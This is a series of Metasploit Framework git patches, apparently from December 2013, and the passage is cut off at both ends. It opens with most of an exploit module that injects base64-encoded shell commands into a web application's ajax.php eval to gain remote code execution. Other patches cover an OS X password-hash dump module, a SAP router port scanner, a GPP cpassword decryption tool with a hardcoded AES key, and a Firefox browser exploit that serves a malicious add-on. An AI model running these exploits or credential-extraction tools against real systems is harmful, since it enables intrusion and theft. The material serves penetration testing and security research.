/Portal\.php/ + print_good("#{peer} - Authenticated as user '#{user}'") + return true + else + print_error("#{peer} - Authenticating as user '#{user}' failed") + return false + end + end + + # + # Send command for execution + # + def execute_command(cmd, opts = { :php_function => 'system' } ) + code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) + junk = rand_text_alphanumeric(rand(10)+6) + print_status("#{peer} - Sending payload (#{code.length} bytes)") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ajax.php'), + 'cookie' => @cookie, + 'vars_post' => { + 'modname' => "#{junk}?#{junk}=#{junk}';#{opts[:php_function]}(base64_decode('#{code}'));//" + } + }) + return res + end + + # + # Check credentials are valid and confirm command execution + # + def check + return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) + fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) + print_status("#{peer} - Sending check") + res = execute_command("echo #{fingerprint}") + if res and res.body =~ /align=center>#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + elsif res + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Unknown + end + + def exploit + return unless login(datastore['USERNAME'], datastore['PASSWORD']) + php_function = [ + 'exec', + 'shell_exec', + 'passthru', + 'system' + ].sample + res = execute_command(payload.encoded, { :php_function => php_function }) + if res and res.code == 200 and res.body =~ /hacking_log/i + print_good("#{peer} - Payload sent successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") + end + end +end + +# +# Source +# +=begin ajax.php +90: if(strpos($_REQUEST['modname'],'?')!==false) +91: { +92: $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1)); +93: $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?')); +94: +95: $vars = explode('?',$vars); +96: foreach($vars as $code) +97: { +98: $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';"); +99: eval($code); +100: } +101: } +=end From 9434d6002125c273df150e3d3e7f7a4efc4905fc Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 19 Dec 2013 10:39:49 -0600 Subject: [PATCH 118/205] Remove EOL whitespace from OS X hashdump --- modules/post/osx/gather/hashdump.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 7f8ecc7080..85f389f207 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -57,19 +57,19 @@ class Metasploit3 < Msf::Post # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist # Here we pull out the binary plist bytes and use built-in plutil to convert to xml plist_bytes = shadow_bytes.split('').each_slice(2).map{|s| "\\x#{s[0]}#{s[1]}"}.join - + # encode the bytes as \x hex string, print using bash's echo, and pass to plutil shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'") - + # read the plaintext xml shadow_xml = REXML::Document.new(shadow_plist) - + # parse out the different parts of sha512pbkdf2 dict = shadow_xml.elements[1].elements[1].elements[2] entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\s+/, '').unpack('m*')[0], '') iterations = dict.elements[4].text.gsub(/\s+/, '') salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\s+/, '').unpack('m*')[0], '') - + # PBKDF2 stored in format decoded_hash = "#{user}:$ml$#{iterations}$#{salt}$#{entropy}" print_good "SHA512:#{decoded_hash}" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Post def lte_tiger? ver_num =~ /10\.(\d+)/ and $1.to_i <= 4 end - + # parse the dslocal plist in lion def read_ds_xml_plist(plist_content) doc = REXML::Document.new(plist_content) From 2480f023b1253f87151f4a81370fa88739bfa783 Mon Sep 17 00:00:00 2001 From: Bruno Morisson Date: Thu, 19 Dec 2013 17:12:08 +0000 Subject: [PATCH 119/205] Dropped scanner mixin. Tried to maintain usage --- .../scanner/sap/sap_router_portscanner.rb | 34 ++++++++++++------- 1 file changed, 21 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index c5e19894c9..666d35422f 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -9,7 +9,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner def initialize super( @@ -37,6 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']), + OptString.new('RHOSTS', [true, 'The target hostname, address range or CIDR identifier', '']), OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']), OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]), OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']), @@ -47,10 +47,11 @@ class Metasploit3 < Msf::Auxiliary # 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002, # 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]), - OptEnum.new('RESOLVE',[true,'Resolve RHOSTS on saprouter',false,['remote','local']]) + OptEnum.new('RESOLVE',[true,'Where to resolve RHOSTS',false,['remote','local']]) ], self.class) deregister_options('RPORT') + deregister_options('RHOST') end @@ -238,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary def parse_response_packet(response, ip, port) - vprint_error("#{ip}:#{port} - response packet: #{response}") + #vprint_error("#{ip}:#{port} - response packet: #{response}") case response when /NI_RTERR/ @@ -255,9 +256,9 @@ class Metasploit3 < Msf::Auxiliary when /reacheable/ vprint_error("#{ip}:#{port} - unreachable") when /hostname '#{ip}' unknown/ - vprint_error("#{ip}:#{port} - unknown host") - when /GetHostByName: '#{ip}' not found/ - vprint_error("#{ip}:#{port} - unknown host") + vprint_error("#{ip}:#{port} - unknown host") + when /GetHostByName: '#{ip}' not found/ + vprint_error("#{ip}:#{port} - unknown host") else vprint_error("#{ip}:#{port} - unknown error message") end @@ -271,6 +272,18 @@ class Metasploit3 < Msf::Auxiliary return nil end + def run + if datastore['RESOLVE'] == 'remote' + run_host(datastore['RHOSTS']) + else + # resolve IP or crack IP range + ip_list = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) + ip_list.each do |ip| + run_host(ip) + end + end + end + def run_host(ip) sap_host = datastore['SAPROUTER_HOST'] @@ -306,13 +319,8 @@ class Metasploit3 < Msf::Auxiliary begin - if datastore['RESOLVE'] == 'remote' - route_ip = datastore['RHOSTS'] - else - route_ip = ip - end # create ni_packet to send to saprouter - routes = {sap_host => sap_port, route_ip => port} + routes = {sap_host => sap_port, ip => port} ni_packet = build_ni_packet(routes) s = connect(false, @@ -325,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary s.write(ni_packet, ni_packet.length) response = s.get() - res = parse_response_packet(response, route_ip, port) + res = parse_response_packet(response, ip, port) if res r << res end From 564601e083c3f1124ab80c4a565e405cc677e911 Mon Sep 17 00:00:00 2001 From: Bruno Morisson Date: Thu, 19 Dec 2013 17:30:34 +0000 Subject: [PATCH 120/205] msftidy - fixed --- .../auxiliary/scanner/sap/sap_router_portscanner.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 666d35422f..e1a4cd169c 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -274,12 +274,12 @@ class Metasploit3 < Msf::Auxiliary def run if datastore['RESOLVE'] == 'remote' - run_host(datastore['RHOSTS']) + run_host(datastore['RHOSTS']) else - # resolve IP or crack IP range - ip_list = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) - ip_list.each do |ip| - run_host(ip) + # resolve IP or crack IP range + ip_list = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) + ip_list.each do |ip| + run_host(ip) end end end From 6422ad2145cdc954bee29708e9ccceaa179c290d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 19 Dec 2013 11:48:36 -0600 Subject: [PATCH 121/205] Adds ability to load post modules in msfcli This is mainly important for normal load testing. It'd be unusual to actually want to use this functionality with msfcli since post modules already need established sessions in order to do something. [SeeRM #8719] --- msfcli | 2 ++ spec/msfcli_spec.rb | 33 ++++++++++++++++++++++++++++++++- 2 files changed, 34 insertions(+), 1 deletion(-) diff --git a/msfcli b/msfcli index fb346c1ca8..ee81c889bc 100755 --- a/msfcli +++ b/msfcli @@ -312,6 +312,8 @@ class Msfcli modules[:module] = @framework.exploits.create($1) elsif module_name =~ /auxiliary\/(.*)/ modules[:module] = @framework.auxiliary.create($1) + elsif module_name =~ /post\/(.*)/ + modules[:module] = @framework.post.create($1) else modules[:module] = @framework.exploits.create(module_name) if modules[:module].nil? diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index 4cc5a988ec..d2133b28ff 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -222,6 +222,37 @@ describe Msfcli do end context ".init_modules" do + + it "should inititalize an exploit module" do + args = 'exploit/windows/smb/psexec S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + + it "should inititalize an auxiliary module" do + args = 'auxiliary/server/browser_autopwn S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + + it "should inititalize a post module" do + args = 'post/windows/gather/credentials/gpp S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + it "should have multi/handler module initialized" do args = "multi/handler payload=windows/meterpreter/reverse_tcp lhost=127.0.0.1 E" m = '' @@ -384,4 +415,4 @@ describe Msfcli do end end -end \ No newline at end of file +end From 284b3507ce6bff63333acda696eafce558b6872d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 19 Dec 2013 12:10:00 -0600 Subject: [PATCH 122/205] Convert gpp_standalone.rb into a standalone script in tools --- modules/auxiliary/gather/gpp_standalone.rb | 66 ----------- spec/tools/cpassword_decrypt_spec.rb | 31 +++++ tools/cpassword_decrypt.rb | 132 +++++++++++++++++++++ 3 files changed, 163 insertions(+), 66 deletions(-) delete mode 100644 modules/auxiliary/gather/gpp_standalone.rb create mode 100644 spec/tools/cpassword_decrypt_spec.rb create mode 100644 tools/cpassword_decrypt.rb diff --git a/modules/auxiliary/gather/gpp_standalone.rb b/modules/auxiliary/gather/gpp_standalone.rb deleted file mode 100644 index de92ced296..0000000000 --- a/modules/auxiliary/gather/gpp_standalone.rb +++ /dev/null @@ -1,66 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - def initialize(info={}) - super( update_info( info, - 'Name' => 'Windows Gather Group Policy "cpassword" Decrypt Standalone', - 'Description' => %q{ - This module will allow you to specify an encrypted cpassword string - using the Microsofts public AES key. This is useful if you don't or - can't use the GPP post exploitation module. Just paste the cpassword - encrypted string and it will output the decrypted string for you. - - Tested Windows Server 2008 R2 Domain Controller. - }, - 'License' => MSF_LICENSE, - 'Author' =>[ - 'Ben Campbell ', - 'Loic Jaquemet ', - 'scriptmonkey ', - 'theLightCosine', - 'mubix', #domain/dc enumeration code - 'David Kennedy "ReL1K" ' # made the standalone module for a straight password decrypt - useful for when you need to manually grab the groups.xml or scheduledtasks.xml manually and need to decrypt without running post exploitation module - ], - 'References' => - [ - ['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'], - ['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'], - ['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'], - ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'] - ], - )) - - register_options( - [ - OptString.new('CPASSWORD', [ true, "The encrypted cpassword string to perform decryption on."]), - ], self.class) - - end - - def decrypt(encrypted_data) - padding = "=" * (4 - (encrypted_data.length % 4)) - epassword = "#{encrypted_data}#{padding}" - decoded = Rex::Text.decode_base64(epassword) - key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" - aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") - aes.decrypt - aes.key = key - plaintext = aes.update(decoded) - plaintext << aes.final - pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion - print_good("The decrypted AES password is: #{pass}") - - end - - def run - encrypted_data = datastore['CPASSWORD'] - pass = decrypt(encrypted_data) - - end -end diff --git a/spec/tools/cpassword_decrypt_spec.rb b/spec/tools/cpassword_decrypt_spec.rb new file mode 100644 index 0000000000..addf839222 --- /dev/null +++ b/spec/tools/cpassword_decrypt_spec.rb @@ -0,0 +1,31 @@ +require 'spec_helper' + +load Metasploit::Framework.root.join('tools/cpassword_decrypt.rb').to_path + +require 'fastlib' +require 'msfenv' +require 'msf/base' + +describe CPassword do + context "Class methods" do + let(:cpasswd) do + CPassword.new + end + + context ".decrypt" do + it "should return the decrypted password as 'testpassword'" do + # Encrypted password for "testpassword" + cpass = "AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk" + pass = cpasswd.decrypt(cpass) + pass.should eq('testpassword') + end + + it "should return an empty string due to a bad password" do + # Invalid password format + cpass = "BadPassword" + pass = cpasswd.decrypt(cpass) + pass.should eq('') + end + end + end +end \ No newline at end of file diff --git a/tools/cpassword_decrypt.rb b/tools/cpassword_decrypt.rb new file mode 100644 index 0000000000..24439fc50e --- /dev/null +++ b/tools/cpassword_decrypt.rb @@ -0,0 +1,132 @@ +#!/usr/bin/env ruby + +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# +# This script will allow you to specify an encrypted cpassword string using the Microsofts public +# AES key. This is useful if you don't or can't use the GPP post exploitation module. Just paste +# the cpassword encrypted string found in groups.xml or scheduledtasks.xml and it will output the +# decrypted string for you. +# +# Tested Windows Server 2008 R2 Domain Controller. +# +# Authors: +# Ben Campbell +# Loic Jaquemet +# scriptmonkey +# theLightCosine +# mubix (domain/dc enumeration code) +# David Kennedy "ReL1K" +# +# References: +# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +# http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13) +# http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html +# http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx +# +# Demo: +# $ ./cpassword_decrypt.rb AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk +# [+] The decrypted AES password is: testpassword +# + +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', 'lib'))) +require 'fastlib' +require 'msfenv' +require 'rex' + + +class CPassword + + # + # Decrypts the AES-encrypted cpassword string + # @param encrypted_data [String] The encrypted cpassword + # @return [String] The decrypted string in ASCII + # + def decrypt(encrypted_data) + # Prepare the password for the decoder + padding = "=" * (4 - (encrypted_data.length % 4)) + epassword = "#{encrypted_data}#{padding}" + + # Decode the string using Base64 + decoded = Rex::Text.decode_base64(epassword) + + # Decryption + key = '' + key << "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc" + key << "\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" + begin + aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") + aes.decrypt + aes.key = key + plaintext = aes.update(decoded) + plaintext << aes.final + rescue OpenSSL::Cipher::CipherError + # Decryption failed possibily due to bad input + return '' + end + + # Converts the string to ASCII + Rex::Text.to_ascii(plaintext) + end +end + + +# +# Shows script usage +# +def usage + print_status("Usage: #{__FILE__} [The encrypted cpassword string]") + exit +end + + +# +# Prints a status message +# +def print_status(msg='') + $stderr.puts "[*] #{msg}" +end + + +# +# Prints an error message +# +def print_error(msg='') + $stderr.puts "[-] #{msg}" +end + + +# +# Prints a good message +# +def print_good(msg='') + $stderr.puts "[+] #{msg}" +end + + +# +# main +# +if __FILE__ == $PROGRAM_NAME + pass = ARGV.shift + + # Input check + usage if pass.nil? or pass.empty? + + cpasswd = CPassword.new + pass = cpasswd.decrypt(pass) + + if pass.empty? + print_error("Nothing was decrypted, please check your input.") + else + print_good("The decrypted AES password is: #{pass}") + end +end \ No newline at end of file From 3c64650a4783e3b5aa79e7419dc7e09d204fbd60 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 19 Dec 2013 12:12:37 -0600 Subject: [PATCH 123/205] +x permission --- tools/cpassword_decrypt.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 tools/cpassword_decrypt.rb diff --git a/tools/cpassword_decrypt.rb b/tools/cpassword_decrypt.rb old mode 100644 new mode 100755 From ad8a15626308850c1bbd1344c420564ecebf2068 Mon Sep 17 00:00:00 2001 From: Bruno Morisson Date: Thu, 19 Dec 2013 18:33:32 +0000 Subject: [PATCH 124/205] RHOSTS can be a comma separated list of hostnames --- modules/auxiliary/scanner/sap/sap_router_portscanner.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index e1a4cd169c..82965fc3e0 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']), - OptString.new('RHOSTS', [true, 'The target hostname, address range or CIDR identifier', '']), + OptString.new('RHOSTS', [true, 'Comma delimited target hostnames, target address range or CIDR identifier', '']), OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']), OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]), OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']), @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary def parse_response_packet(response, ip, port) - #vprint_error("#{ip}:#{port} - response packet: #{response}") + vprint_error("#{ip}:#{port} - response packet: #{response}") case response when /NI_RTERR/ @@ -274,7 +274,9 @@ class Metasploit3 < Msf::Auxiliary def run if datastore['RESOLVE'] == 'remote' - run_host(datastore['RHOSTS']) + datastore['RHOSTS'].split(/,/).each do |host| + run_host(host) + end else # resolve IP or crack IP range ip_list = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) From 773d4c5cd1aa7d70f86f410a44afc24681be9a89 Mon Sep 17 00:00:00 2001 From: Bruno Morisson Date: Thu, 19 Dec 2013 18:35:11 +0000 Subject: [PATCH 125/205] commented out response packet vprint --- modules/auxiliary/scanner/sap/sap_router_portscanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 82965fc3e0..885794e1b5 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary def parse_response_packet(response, ip, port) - vprint_error("#{ip}:#{port} - response packet: #{response}") + #vprint_error("#{ip}:#{port} - response packet: #{response}") case response when /NI_RTERR/ From ca23b321611a13facbebce7846edcd899d65395a Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Thu, 19 Dec 2013 12:49:05 -0600 Subject: [PATCH 126/205] Add support for Procs in browserexploit requirements. --- .../exploit/remote/browser_exploit_server.rb | 13 +++- .../remote/browser_exploit_server_spec.rb | 70 ++++++++++++++++--- 2 files changed, 72 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d9c94c5b78..87f4f82ebd 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -92,6 +92,15 @@ module Msf "#{get_resource.chomp("/")}/#{@exploit_receiver_page}" end + # + # Returns the absolute URL to the module's resource that points to on_request_exploit + # + # @return [String] absolute URI to the exploit page + # + def get_module_uri + "#{get_uri.chomp("/")}/#{@exploit_receiver_page}" + end + # # Returns the current target # @@ -166,8 +175,10 @@ module Msf # Special keys to ignore because the script registers this as [:activex] = true or false next if k == :clsid or k == :method - if v.class == Regexp + if v.is_a? Regexp bad_reqs << k if profile[k.to_sym] !~ v + elsif v.is_a? Proc + bad_reqs << k unless v.call(profile[k.to_sym]) else bad_reqs << k if profile[k.to_sym] != v end diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb index f6a4cd13e0..53d4b035a7 100644 --- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb +++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb @@ -64,19 +64,69 @@ describe Msf::Exploit::Remote::BrowserExploitServer do end describe ".get_bad_requirements" do - it "should not contain any bad requirements" do - server.get_bad_requirements(expected_profile).should eq([]) + let(:rejected_requirements) do + server.get_bad_requirements(fake_profile) end - it "should have identify :os_name as a requirement not met" do - fake_profile = { - "rMWwSAwBHLoESpHbEGbsv" => { - :os_name => expected_os_name - }} + context 'when given the expected profile' do + it "should not contain any bad requirements" do + server.get_bad_requirements(expected_profile).should eq([]) + end + end - server.instance_variable_set(:@requirements, {:os_name => /win/i}) - baddies = server.get_bad_requirements(fake_profile) - baddies.should eq([:os_name]) + context 'when attempting to match :os_name' do + let(:fake_profile) do + { :os_name => expected_os_name } + end + + before do + server.instance_variable_set(:@requirements, {:os_name => /win/i}) + end + + it "should have identify :os_name as a requirement not met" do + rejected_requirements.should eq([:os_name]) + end + end + + context 'when attempting to match :ua_ver' do + context 'against version 25.0' do + let(:expected_ua_ver) { '25.0' } + let(:fake_profile) do + { :ua_ver => expected_ua_ver } + end + + before do + server.instance_variable_set(:@requirements, {:ua_ver => ua_ver}) + end + + context "with the regex /26\.0$/" do + let(:ua_ver) { /26\.0$/ } + it "should reject :ua_ver" do + rejected_requirements.should include(:ua_ver) + end + end + + context "with the regex /25\.0$/" do + let(:ua_ver) { /25\.0$/ } + it "should accept :ua_ver" do + rejected_requirements.should_not include(:ua_ver) + end + end + + context "with a Proc that checks if version is between 1-5" do + let(:ua_ver) { lambda{ |ver| ver.to_i.between?(1, 5) } } + it "should reject :ua_ver" do + rejected_requirements.should include(:ua_ver) + end + end + + context "with a Proc that checks if version is between 20-26" do + let(:ua_ver) { lambda{ |ver| ver.to_i.between?(20, 26) } } + it "should accept :ua_ver" do + rejected_requirements.should_not include(:ua_ver) + end + end + end end end From b50bbc2f84dba387a31fba9bb8c3c00b195447b0 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Thu, 19 Dec 2013 12:49:24 -0600 Subject: [PATCH 127/205] Update module to use sinn3r's beautiful browserexploitserver. --- .../browser/firefox_proto_crmfrequest.rb | 40 +++++++++++-------- 1 file changed, 23 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 3d7ccf0dd2..7edc5c2160 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE include Msf::Exploit::Remote::FirefoxAddonGenerator @@ -40,7 +40,12 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'], ['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23) ['OSVDB', '96019'] - ] + ], + 'BrowserRequirements' => { + :source => 'script', + :ua_name => HttpClients::FF, + :ua_ver => lambda { |ver| ver.to_i.between?(5, 15) } + } )) register_options([ @@ -48,15 +53,23 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def on_request_uri(cli, request) + def on_request_exploit(cli, request, target_info) if request.uri.match(/\.xpi$/i) - send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } ) + print_status("Sending the malicious addon") + send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' }) else - send_response_html(cli, generate_html) + print_status("Sending HTML") + send_response_html(cli, generate_html(target_info)) end end - def generate_html + def generate_html(target_info) + injection = if target_info[:ua_ver].to_i == 15 + "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);" + else + "p2.constructor.defineProperty(obj,key,{get:runme});" + end + %Q| @@ -64,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote